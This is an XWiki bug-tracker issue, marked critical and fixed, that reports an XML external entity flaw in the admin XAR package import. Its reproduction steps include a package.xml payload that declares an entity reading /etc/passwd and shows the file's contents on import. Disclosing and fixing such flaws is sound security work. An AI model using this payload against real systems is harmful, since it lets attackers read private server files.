Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Fixed
Priority: Critical
Fix Version/s: 13.10.11, 14.4.7, 14.10
Affects Version/s: 1.1 M3
Component/s: Old Core
Labels:

Difficulty:
Unknown
Documentation:
N/A
Documentation in Release Notes:
N/A
Similar issues:

Description

To reproduce:

Create a XAR package and modify the package.xml's like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
...

Go to the Admin UI > Import
Notice that this allows you to see the content of /etc/passwd

Attachments

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending
- Thumbnails
- List
- Download All

Screenshot 2022-11-04 at 10.25.08.png
04/Nov/22 10:28
272 kB
Vincent Massol
Screenshot 2022-11-04 at 10.57.12.png
04/Nov/22 11:18
177 kB
Vincent Massol
test.xar
04/Nov/22 10:57
15 kB
Vincent Massol

Issue Links

is related to

XWIKI-20267 Privilege escalation (PR) from account through AdminImportSheet/importinline.vm

Closed

Activity

People

Assignee:: Vincent Massol

Reporter:: Vincent Massol

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 04/Nov/22 10:28

Updated:: 07/Mar/23 17:44

Resolved:: 04/Nov/22 11:18